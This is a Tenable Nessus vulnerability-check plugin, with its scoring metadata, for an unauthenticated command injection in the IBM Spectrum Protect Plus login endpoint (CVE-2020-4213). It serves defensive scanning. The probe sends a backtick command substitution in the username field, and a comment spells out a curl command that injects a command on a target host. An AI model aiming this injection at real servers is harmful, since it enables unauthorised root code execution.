CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
97.3%
The IBM Spectrum Protect Plus administrative console running on the remote host is affected by a remote command injection vulnerability due to improper validation of user-supplied data when processing a login HTTP request. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to execute arbitrary code on the system with root privileges.
Note that the application is reportedly affected by other vulnerabilities; however, this plugin has not tested for those issues.
#
# (C) Tenable Network Security, Inc.
#
include('compat.inc');
# Registration phase. When the engine loads the plugin with `description`
# set, this branch only records metadata and exits at exit(0) below; no
# request is sent to the target from inside this block.
if (description)
{
script_id(135852);
script_version("1.2");
script_set_attribute(attribute:"plugin_modification_date", value:"2020/04/23");
script_cve_id("CVE-2020-4213");
script_xref(name:"ZDI", value:"ZDI-20-270");
script_name(english:"IBM Spectrum Protect Plus username Command Injection");
script_set_attribute(attribute:"synopsis", value:
"A web application running on the remote host is affected by a
remote code execution vulnerability.");
script_set_attribute(attribute:"description", value:
"The IBM Spectrum Protect Plus administrative console running on the
remote host is affected by a remote command injection vulnerability
due to improper validation of user-supplied data when processing a
login HTTP request. An unauthenticated, remote attacker can exploit
this, via a specially crafted HTTP request, to execute arbitrary code
on the system with root privileges.
Note that the application is reportedly affected by other
vulnerabilities; however, this plugin has not tested for those issues.");
script_set_attribute(attribute:"see_also", value:"https://www.ibm.com/support/pages/node/3178863");
# Remediation is a package-level fix (spp-emi), not a configuration change;
# the version check itself is not performed by this plugin, which instead
# probes the login endpoint behaviourally (see the code after the includes).
script_set_attribute(attribute:"solution", value:
"Update the IBM Spectrum Protect Plus RPM package spp-emi to
10.1.5-217 or later. That spp-emi package should be in the IBM
Spectrum Protect Plus 10.1.5 patch1.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
# NOTE(review): the v3 vectors here are tagged CVSS:3.0, while the page
# metadata above lists the same metrics under CVSS:3.1 -- confirm which
# version the record should carry.
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-4213");
# NOTE(review): this exploitability statement dates from the 2020 plugin
# release (script_version 1.2, modified 2020/04/23); the EPSS percentile
# shown in the page header (97.3%) was published later -- verify the
# attribute is still accurate before relying on it for prioritisation.
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"vuln_publication_date", value:"2020/02/21");
script_set_attribute(attribute:"patch_publication_date", value:"2020/02/21");
script_set_attribute(attribute:"plugin_publication_date", value:"2020/04/21");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:spectrum_protect_plus");
script_end_attributes();
# ACT_ATTACK: the check below is an active probe that posts a payload
# containing a command substitution to the target's login endpoint; it is
# not a passive version or banner check.
script_category(ACT_ATTACK);
script_family(english:"General");
script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
# The detection plugin must run first; the installed_sw key below is
# presumably populated by ibm_spp_admin_console_detect.nbin and must match
# the `app` string used after the includes -- verify if either is renamed.
script_dependencies("ibm_spp_admin_console_detect.nbin");
script_require_keys("installed_sw/IBM Spectrum Protect Plus Administrative Console");
# 8090 is the same port used in the confirmation example further down.
script_require_ports("Services/www", 8090);
exit(0);
}
include('http.inc');
include('json.inc');
include('webapp_func.inc');
# Detection phase.
#
# The plugin does NOT look for the output of the injected command in the
# response. Instead it distinguishes patched from unpatched servers by the
# exceptionDescription string returned for a failed login (fixtures below),
# so the result is a behavioural fingerprint rather than observed command
# execution; `generic : TRUE` on the report is consistent with that.
#
# Must match the installed_sw key required in the description block.
app = 'IBM Spectrum Protect Plus Administrative Console';
# Exit if app is not detected on the host.
get_install_count(app_name:app, exit_if_zero:TRUE);
# Exit if app is not detected on this www port.
port = get_service(svc:'www', exit_on_fail:TRUE);
get_single_install(app_name:app, port:port);
# Login endpoint named in the advisory text; the vulnerable parameter is
# `username` in the POST body.
url = '/emi/api/login';
# To confirm the vulnerability, use the following CURL command:
#
# curl -ki --tlsv1.2 -d 'ltype=product&username=`id>/tmp/id`&password=bar'
# 'https://<target_host>:8090/emi/api/login/'
#
# and check if /tmp/id is created on the target host.
#
# The probe below wraps a harmless `id` in backticks; the response is only
# checked for the error text, never for "uid=" output.
data = 'ltype=product&username=`id`&password=AAAAAAAA';
# exit_on_fail: transport failures end the plugin here rather than being
# mis-read as a patched/unpatched verdict below.
res = http_send_recv3(
port : port,
method : 'POST',
item : url,
data : data,
content_type : 'application/x-www-form-urlencoded',
exit_on_fail : TRUE
);
# res[0] is used as the status line and res[2] as the body. Anything other
# than a 200 is reported as an unexpected response, not as "not vulnerable".
if(' 200 ' >!< res[0])
audit(AUDIT_RESP_BAD, port, 'an HTTP request. Unexpected HTTP response status ' + chomp(res[0]));
if(empty_or_null(res[2]))
audit(AUDIT_RESP_BAD, port, 'an HTTP request. No HTTP response data');
# json[0] is used as the parsed document; a null json[1] is treated as a
# parse failure (presumably the parser's end position -- verify against
# json.inc).
json = json_read(res[2]);
if(isnull(json[1]))
audit(AUDIT_RESP_BAD, port, 'an HTTP request. No JSON data in HTTP response');
# Both fixtures below carry the verdict in authoutput.exceptionDescription;
# a response lacking either field is reported as malformed.
authoutput = json[0].authoutput;
if(empty_or_null(authoutput))
audit(AUDIT_RESP_BAD, port, 'an HTTP request. No authoutput in HTTP response');
exception = authoutput.exceptionDescription;
if(empty_or_null(exception))
audit(AUDIT_RESP_BAD, port, 'an HTTP request. No exceptionDescription in authoutput');
# Patched server uses REST API to perform user login as opposed to
# using the CURL command.
#
# Patched response:
# {"authoutput":{"returnCode":null,"sessionId":null,"exceptionId":null,"exceptionDescription":"org.springframework.web.client.HttpClientErrorException: 401 null","licenseOutput":null}}
if('org.springframework.web.client.HttpClientErrorException' >< exception)
audit(AUDIT_LISTEN_NOT_VULN, app, port);
#
# Vulnerable response:
# {"authoutput":{"returnCode":"0","sessionId":null,"exceptionId":"XSBAuthenticationException","exceptionDescription":"Login has failed due to incorrect user name or password. Try again.","licenseOutput":null}}
#
# NOTE(review): this branch fires on the error text alone, so a build that
# returns this message yet has been hardened some other way would still be
# reported; conversely a patched build whose exception text differs from
# the Spring fixture above falls through to the final audit() instead of
# being reported as not vulnerable. Re-validate both fixtures if the
# vendor changes the login error handling.
else if ('Login has failed due to incorrect user name' >< exception)
{
security_report_v4(
port : port,
severity : SECURITY_HOLE,
generic : TRUE,
request : make_list(http_last_sent_request()),
output : res[2]
);
}
# Neither fixture matched: report the unexpected response rather than
# guessing a verdict.
else
audit(AUDIT_RESP_BAD, port, 'an HTTP request. Unexpected exceptionDescription in authoutput');
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
97.3%